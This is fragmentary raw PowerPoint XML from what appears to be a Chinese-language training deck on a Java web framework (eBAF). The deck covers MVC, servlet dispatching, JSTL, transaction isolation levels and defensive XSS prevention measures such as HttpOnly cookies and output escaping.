              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cookies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HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>禁止前端讀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>library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framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>閱讀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>XSS Prevention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602155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Servelet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(web.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>filter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JSTL or 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406812"/>
            <a:ext cx="831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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0" err="1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c:out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bean.userControlledValue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&lt;p&gt;&lt;input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name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"foo"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fn:escapeXml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param.foo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)}"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564" y="2250618"/>
            <a:ext cx="6943110" cy="257629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88032" y="1281811"/>
            <a:ext cx="4165022" cy="1564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588917" y="2845891"/>
            <a:ext cx="10067210" cy="101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6096000" y="355415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&gt;&gt;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243:ifnull + 16 -&gt; 259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7978047" y="3992778"/>
            <a:ext cx="391477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7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程式邏輯、資料庫存取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>View: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畫面呈現</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Controller: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控制流程、轉發請求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://coldbox.ortusbooks.com/content/full/images/mvc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6" y="471487"/>
            <a:ext cx="6572250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10052513" y="2746313"/>
            <a:ext cx="1557596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Module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0135120" y="403483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9241559" y="5609808"/>
            <a:ext cx="1325187" cy="1325187"/>
            <a:chOff x="9241559" y="5457479"/>
            <a:chExt cx="1325187" cy="1325187"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1026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051636" y="2899435"/>
            <a:ext cx="1000877" cy="52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2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10831311" y="3425247"/>
            <a:ext cx="0" cy="609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9411855" y="3103028"/>
            <a:ext cx="640658" cy="32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9628275" y="5323350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0181585" y="5298657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527082" y="3906628"/>
            <a:ext cx="608038" cy="29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 flipV="1">
            <a:off x="9411855" y="4118605"/>
            <a:ext cx="722516" cy="37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16482" y="3931117"/>
            <a:ext cx="45817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{DEMOA0_0110=com.cathaybk.demo.a0.trx.DEMOA0_0110, DEMOA0_0100=com.cathaybk.demo.a0.trx.DEMOA0_0100, MEPST0_0200=com.cathaybk.meps.t0.trx.MEPST0_0200, XXT0_0300=com.cathaybk.xx.t0.trx.XXT0_0300, MEPST0_0300=com.cathaybk.meps.t0.trx.MEPST0_0300, XXT0_0200=com.cathaybk.xx.t0.trx.XXT0_0200, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>SysNews_BK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>com.cathaybk.common.trx.SysNews_BK</a:t>
            </a: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28656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2545" y="2333801"/>
            <a:ext cx="1763910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Web.xml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66904" y="2867358"/>
            <a:ext cx="2566782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Log4jAwareDispatcher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6500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00389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Log4jAwareDispatcher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834748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BeanProxy.init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(true)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4344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68233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BeanProxy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902592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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>m_namingMappings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20" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9807349" y="3303740"/>
            <a:ext cx="447832" cy="62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2142" y="3407352"/>
            <a:ext cx="2133600" cy="29045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4322751" y="441379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燕尾形向右箭號 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6085742" y="4177695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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url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?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波浪 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3952142" y="5550982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2106" y="1661855"/>
            <a:ext cx="3154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/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>XXWeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>/servlet/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>HttpDispatcher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2409653"/>
            <a:ext cx="8358515" cy="300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直線單箭頭接點 14"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4829908" y="2031187"/>
            <a:ext cx="419585" cy="446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838200" y="2844824"/>
            <a:ext cx="10178436" cy="714283"/>
            <a:chOff x="838200" y="2844824"/>
            <a:chExt cx="10178436" cy="71428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249" y="2844824"/>
              <a:ext cx="4286736" cy="354658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224544"/>
              <a:ext cx="10178436" cy="334563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</p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="直線單箭頭接點 20"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5249493" y="2031187"/>
            <a:ext cx="3062169" cy="1241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7853852" y="41777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放主程式對應到的程式碼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>callMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>…..)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585" y="328360"/>
            <a:ext cx="2133600" cy="285959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3890194" y="1289850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燕尾形向右箭號 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5653185" y="1053748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url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波浪 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3519585" y="2427035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227658" y="328360"/>
            <a:ext cx="2854778" cy="285959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8660613" y="1138546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89948" y="3322890"/>
            <a:ext cx="7575119" cy="2798033"/>
            <a:chOff x="965027" y="2181777"/>
            <a:chExt cx="5274310" cy="1948180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="圖片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5027" y="2181777"/>
              <a:ext cx="5274310" cy="1948180"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="直線單箭頭接點 12"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4263242" y="2648197"/>
              <a:ext cx="23750" cy="1187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4766875" y="6077868"/>
            <a:ext cx="51162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XXWeb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servlet/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HttpDispatcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/XXT0_0200/prompt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6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0280083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0737175" y="5040023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1290485" y="5015330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9527082" y="3616037"/>
            <a:ext cx="753001" cy="1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9492298" y="3908872"/>
            <a:ext cx="787785" cy="1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10347278" y="5393629"/>
            <a:ext cx="1325187" cy="1325187"/>
            <a:chOff x="9241559" y="5457479"/>
            <a:chExt cx="1325187" cy="1325187"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30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字方塊 30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5361483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486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XXT00200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837981" y="4390639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XXT0_0200_mod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10007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XX_CARS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4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2321</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>414</Paragraphs>
  <Slides>32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4" baseType="lpstr">
      <vt:lpstr>inherit</vt:lpstr>
      <vt:lpstr>細明體</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>eBAF</vt:lpstr>
      <vt:lpstr>MVC</vt:lpstr>
      <vt:lpstr>eBAF架構</vt:lpstr>
      <vt:lpstr>Init Servlet</vt:lpstr>
      <vt:lpstr>Request</vt:lpstr>
      <vt:lpstr>Request</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>回傳</vt:lpstr>
      <vt:lpstr>JSTL&amp;EL</vt:lpstr>
      <vt:lpstr>JSP</vt:lpstr>
      <vt:lpstr>JSTL</vt:lpstr>
      <vt:lpstr>Exception</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Transaction</vt:lpstr>
      <vt:lpstr>交易管理</vt:lpstr>
      <vt:lpstr>交易控制</vt:lpstr>
      <vt:lpstr>交易四大原則</vt:lpstr>
      <vt:lpstr>交易控制-連線</vt:lpstr>
      <vt:lpstr>交易控制-連線</vt:lpstr>
      <vt:lpstr>隔離等級</vt:lpstr>
      <vt:lpstr>Dirty read</vt:lpstr>
      <vt:lpstr>Unrepeatable Read</vt:lpstr>
      <vt:lpstr>Phantom  Read</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>XSS-Types</vt:lpstr>
      <vt:lpstr>XSS-Preventive measures</vt:lpstr>
      <vt:lpstr>XSS-Preventive measures</vt:lpstr>
      <vt:lpstr>自訂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盛昱叡</dc:creator>
  <cp:lastModifiedBy>Ray Sheng</cp:lastModifiedBy>
  <cp:revision>140</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-12-05T07:13:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-17T15:40:44Z</dcterms:modified>
</cp:coreProperties>
</file>